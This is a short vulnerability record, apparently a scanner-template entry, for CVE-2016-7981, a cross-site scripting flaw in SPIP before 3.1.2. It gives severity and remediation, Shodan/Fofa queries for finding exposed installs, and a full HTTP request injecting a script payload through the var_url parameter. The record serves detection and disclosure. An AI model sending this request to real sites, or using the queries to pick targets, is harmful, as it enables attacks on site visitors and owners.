| Title | SPIP <3.1.2 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser. |
| Remediation | Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.37001 |
| CVE ID | CVE-2016-7981 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"spip.php?page=backend"cpe:"cpe:2.3:a:spip:spip" |
| Fofa Query | body="spip.php?page=backend" |
| Tags | cve2016 cve xss spip vuln |
SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-7981.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-7981.pcap
N/AN/A